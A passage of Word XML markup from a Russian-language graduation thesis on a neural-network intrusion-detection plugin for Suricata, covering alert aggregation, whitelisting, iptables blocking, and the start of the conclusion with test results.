          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> реализована через анализ файла </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в режиме слежения или пакетного анализа. Более глубокая интеграция возможна </w:t>
      </w:r>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">через механизм Unix-сокета </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, что позволит передавать события в плагин в режиме реального времени с минимальной задержкой. Перспективным направлением также является реализация плагина в виде встроенного модуля </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, что исключит необходимость в отдельном процессе и снизит накладные расходы на обработку данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5160BD01" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00532842" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нейросетевой плагин не рекомендуется использовать как единственное средство защиты при защите веб-приложений от атак на уровне содержимого запросов, при обнаружении целевых атак с низкой интенсивностью трафика, а также в сетях с нестандартными профилями трафика без предварительного дообучения модели. В этих сценариях плагин следует использовать совместно с классическими сигнатурными правилами </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и средствами анализа журналов приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073FC23B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00532842" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Одной из практических проблем, выявленных в ходе тестирования, является большое количество срабатываний при некоторых типах атак — в тесте с атакой типа отказа в обслуживании было зафиксировано более 20 000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, что делает ручной разбор практически невозможным. Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в аналогичной ситуации сформировала лишь 124 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алерта</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> за счёт встроенного механизма агрегации событий. Решением данной проблемы является введение механизма агрегации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — объединение однотипных срабатываний с одного адреса за заданный промежуток времени в один инцидент с указанием общего числа событий. Дополнительно можно реализовать автоматическую приоритизацию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на основе уверенности модели и частоты срабатываний, что позволит администратору сосредоточиться на наиболее критичных событиях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B165E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00B04E8E" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В целях снижения уровня ложных срабатываний в разработанном программном комплексе реализован механизм белого списка адресов. Администратор системы может исключить из анализа заведомо легитимные узлы сети — например адреса корпоративных серверов обновлений, систем мониторинга или резервного копирования — что позволяет существенно снизить фоновый уровень ложных срабатываний без изменения параметров модели и без </w:t>
      </w:r>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>необходимости переобучения нейронной сети. Данный подход позволяет оперативно адаптировать систему к особенностям конкретной сетевой инфраструктуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C6059F" w14:textId="77777777" w:rsidR="00106F01" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Помимо пассивного обнаружения угроз, в комплексе реализован механизм активного реагирования на атаки. При превышении порогового значения в 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с одного IP-адреса за 30 секунд система автоматически формирует уведомление для администратора. Администратор может принять решение о блокировке атакующего узла непосредственно из интерфейса — без необходимости обращения к командной строке. Блокировка выполняется через механизм сетевого экрана </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> путём добавления запрещающего правила для входящего трафика с указанного адреса. Все операции блокировки и разблокировки фиксируются в журнале аудита с указанием времени и имени администратора, принявшего решение.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2865F22F" w14:textId="7BB3335A" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, результаты сравнительного анализа подтверждают, что нейросетевой и сигнатурный подходы являются взаимодополняющими методами обнаружения угроз. Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B04E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечивает высокую точность и минимальное число ложных срабатываний для известных угроз с чёткими сигнатурами. Нейросетевой плагин расширяет покрытие на поведенческие аномалии и неизвестные угрозы, недоступные сигнатурному методу. Совместное использование обоих подходов позволяет существенно повысить общую эффективность системы обнаружения вторжений по сравнению с применением каждого метода в отдельности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B66BF8F" w14:textId="77777777" w:rsidR="00BD74AB" w:rsidRPr="00ED4CBB" w:rsidRDefault="00BD74AB" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F78664F" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDAA26C" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE2E049" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE119B8" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDED9FA" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382EE4A6" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00772345" w:rsidRDefault="009534A2" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3745F7AC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc230947686"/>
      <w:bookmarkStart w:id="25" w:name="_Toc231673294"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="464B2724" w14:textId="77777777" w:rsidR="00BD6272" w:rsidRPr="00BD6272" w:rsidRDefault="00BD6272" w:rsidP="00BD6272"/>
    <w:p w14:paraId="16F7B161" w14:textId="77777777" w:rsidR="009D7303" w:rsidRPr="009D7303" w:rsidRDefault="009D7303" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В ходе выполнения выпускной квалификационной работы был разработан нейросетевой плагин для системы обнаружения вторжений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, обеспечивающий поведенческий анализ сетевого трафика на основе метаданных сетевых потоков в формате EVE JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375C9F5F" w14:textId="77777777" w:rsidR="009D7303" w:rsidRPr="009D7303" w:rsidRDefault="009D7303" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В рамках работы были решены все поставленные задачи. Проведён анализ архитектуры стандартной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и выявлены ключевые ограничения сигнатурного подхода — невозможность обнаружения ранее неизвестных угроз и уязвимость к модификации вредоносного трафика. Разработана модель нарушителя и модель угроз в соответствии с методологией ФСТЭК России, определены актуальные угрозы для корпоративной сетевой инфраструктуры. Сформирован и подготовлен датасет на основе набора данных CIC-IDS, разработана и обучена нейросетевая модель на базе архитектуры многослойного персептрона, сохранённая в формате ONNX для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>платформонезависимого</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инференса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775ABDC6" w14:textId="77777777" w:rsidR="009D7303" w:rsidRPr="009D7303" w:rsidRDefault="009D7303" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Разработанный программный комплекс реализует анализ сетевых потоков в режиме реального времени через интеграцию с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, веб-интерфейс с визуализацией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и статистики, ролевую модель разграничения доступа с тремя уровнями привилегий, двухфакторную аутентификацию на основе протокола TOTP, контроль целостности файлов нейросетевой модели по алгоритму SHA-256, журнал аудита всех действий пользователей, механизм белого списка адресов и активную блокировку атакующих узлов через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F52F5" w14:textId="77777777" w:rsidR="009D7303" w:rsidRPr="009D7303" w:rsidRDefault="009D7303" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">По результатам тестирования на 14 сценариях атак в соответствии с классификацией OWASP Top 10 и матрицей MITRE ATT&amp;CK нейросетевой плагин обнаружил 12 из 13 активных сценариев — эффективность 92.3% против 38.5% у классической </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
